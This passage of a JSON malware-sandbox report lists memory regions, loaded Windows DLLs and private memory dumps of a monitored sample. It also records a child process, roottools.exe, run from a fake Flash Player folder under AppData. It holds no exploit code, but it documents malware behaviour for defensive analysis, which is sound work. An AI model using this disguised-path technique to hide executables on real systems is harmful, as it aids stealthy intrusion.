"timestamp": "00:01:18.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1975844864, "type": "region", "version": 1 }, "end_va": 1988730879, "entry_point": 1975844864, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1204", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1975844864, "timestamp": "00:01:19.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1963786240, "type": "region", "version": 1 }, "end_va": 1964142591, "entry_point": 1963786240, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1205", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1963786240, "timestamp": "00:01:20.732", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1955725312, "type": "region", "version": 1 }, "end_va": 1955839999, "entry_point": 1955725312, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_1206", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1955725312, "timestamp": "00:01:21.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1998848000, "type": "region", "version": 1 }, "end_va": 1998872575, "entry_point": 1998848000, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_1207", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1998848000, "timestamp": "00:01:21.751", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1955659776, "type": "region", "version": 1 }, "end_va": 1955688447, "entry_point": 1955659776, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_1208", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1955659776, "timestamp": "00:01:21.757", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001209-addr_0x0000000000290000-size_0x0000000000008000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_321", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 32768, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2719743, "entry_point": 0, "filename": null, "id": "region_1209", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:01:21.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1955528704, "type": "region", "version": 1 }, "end_va": 1955602431, "entry_point": 1955528704, "filename": "\\Windows\\SysWOW64\\dhcpcsvc.dll", "id": "region_1210", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\syswow64\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 1955528704, "timestamp": "00:01:21.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1971912704, "type": "region", "version": 1 }, "end_va": 1972129791, "entry_point": 1971912704, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_1211", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1971912704, "timestamp": "00:01:21.853", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001212-addr_0x0000000002580000-size_0x00000000000f0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_322", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 983040, "start_va": 39321600, "type": "region", "version": 1 }, "end_va": 40304639, "entry_point": 0, "filename": null, "id": "region_1212", "name": "private_0x0000000002580000", "norm_filename": null, "region_type": "private_memory", "start_va": 39321600, "timestamp": "00:01:21.953", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001213-addr_0x00000000026c0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_323", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 40632320, "type": "region", "version": 1 }, "end_va": 40894463, "entry_point": 0, "filename": null, "id": "region_1213", "name": "private_0x00000000026c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40632320, "timestamp": "00:01:21.954", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001214-addr_0x00000000003a0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_324", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 4063231, "entry_point": 0, "filename": null, "id": "region_1214", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:01:21.961", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001215-addr_0x0000000002700000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_325", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 40894464, "type": "region", "version": 1 }, "end_va": 41943039, "entry_point": 0, "filename": null, "id": "region_1215", "name": "private_0x0000000002700000", "norm_filename": null, "region_type": "private_memory", "start_va": 40894464, "timestamp": "00:01:21.962", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001216-addr_0x0000000002860000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_326", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 42336256, "type": "region", "version": 1 }, "end_va": 42401791, "entry_point": 0, "filename": null, "id": "region_1216", "name": "private_0x0000000002860000", "norm_filename": null, "region_type": "private_memory", "start_va": 42336256, "timestamp": "00:01:21.962", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001217-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_327", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1217", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:21.962", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 134217728, "start_va": 56229888, "type": "region", "version": 1 }, "end_va": 190447615, "entry_point": 0, "filename": null, "id": "region_1218", "name": "private_0x00000000035a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 56229888, "timestamp": "00:01:21.967", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001219-addr_0x0000000000400000-size_0x000000000001c000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_328", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 114688, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4308991, "entry_point": 0, "filename": null, "id": "region_1219", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:21.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1973342207, "entry_point": 1972174848, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_1220", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:01:22.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1963720704, "type": "region", "version": 1 }, "end_va": 1963769855, "entry_point": 1963720704, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_1221", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1963720704, "timestamp": "00:01:22.146", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1961558016, "type": "region", "version": 1 }, "end_va": 1961578495, "entry_point": 1961558016, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_1222", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1961558016, "timestamp": "00:01:22.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1967411199, "entry_point": 1966407680, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_1223", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:01:22.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1992556544, "type": "region", "version": 1 }, "end_va": 1993826303, "entry_point": 1992556544, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_1224", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1992556544, "timestamp": "00:01:22.381", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1961623552, "type": "region", "version": 1 }, "end_va": 1963700223, "entry_point": 1961623552, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_1225", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1961623552, "timestamp": "00:01:22.664", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1955463168, "type": "region", "version": 1 }, "end_va": 1955495935, "entry_point": 1955463168, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_1226", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1955463168, "timestamp": "00:01:22.794", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001227-addr_0x0000000001df0000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_329", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 32047103, "entry_point": 0, "filename": null, "id": "region_1227", "name": "private_0x0000000001df0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31391744, "timestamp": "00:01:22.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1955332096, "type": "region", "version": 1 }, "end_va": 1955422207, "entry_point": 1955332096, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_1228", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1955332096, "timestamp": "00:01:22.831", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 39321600, "type": "region", "version": 1 }, "end_va": 39567359, "entry_point": 39321600, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1229", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 39321600, "timestamp": "00:01:22.880", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001230-addr_0x0000000002630000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_330", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 40042496, "type": "region", "version": 1 }, "end_va": 40304639, "entry_point": 0, "filename": null, "id": "region_1230", "name": "private_0x0000000002630000", "norm_filename": null, "region_type": "private_memory", "start_va": 40042496, "timestamp": "00:01:22.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955069952, "type": "region", "version": 1 }, "end_va": 1955311615, "entry_point": 1955069952, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1235", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955069952, "timestamp": "00:01:22.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2756607, "entry_point": 0, "filename": null, "id": "region_1236", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:01:22.948", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001237-addr_0x0000000000330000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_331", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1237", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:22.965", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001238-addr_0x0000000000360000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_332", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_1238", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:22.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 28672, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3436543, "entry_point": 0, "filename": null, "id": "region_1239", "name": "pagefile_0x0000000000340000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3407872, "timestamp": "00:01:22.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 28672, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3371007, "entry_point": 0, "filename": null, "id": "region_1240", "name": "pagefile_0x0000000000330000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3342336, "timestamp": "00:01:22.967", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001292-addr_0x0000000000330000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_333", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1292", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:22.989", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001346-addr_0x0000000000330000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_334", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1346", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:23.012", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001400-addr_0x0000000000330000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_335", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1400", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:23.035", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001454-addr_0x0000000000330000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_336", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1454", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:23.058", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001508-addr_0x0000000000330000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_337", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1508", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:23.082", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001556-addr_0x0000000000330000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_338", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1556", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:23.103", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001559-addr_0x0000000000330000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_339", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1559", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:23.115", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001562-addr_0x0000000000330000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_340", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1562", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:23.127", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001565-addr_0x0000000000330000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_341", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1565", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:23.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1954873344, "type": "region", "version": 1 }, "end_va": 1955008511, "entry_point": 1954873344, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_1568", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1954873344, "timestamp": "00:01:23.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1991311360, "type": "region", "version": 1 }, "end_va": 1991593983, "entry_point": 1991311360, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_1569", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1991311360, "timestamp": "00:01:23.347", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001570-addr_0x0000000000330000-size_0x0000000000030000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_342", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 196608, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3538943, "entry_point": 0, "filename": null, "id": "region_1570", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:23.660", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"", "filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "id": "proc_7", "image_name": "roottools.exe", "monitor_reason": "child_process", "monitored_id": 7, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000007-region_00001571-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_343", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1571", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:23.675", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001572-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_344", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1572", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:23.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1573", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:23.676", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001574-addr_0x0000000000050000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_345", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_1574", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:23.676", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001575-addr_0x0000000000090000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_346", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_1575", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:23.676", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001576-addr_0x0000000000400000-size_0x0000000000033000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_347", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 208896, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4403199, "entry_point": 4194304, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "id": "region_1576", "name": "roottools.exe", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:23.677", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1577", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": 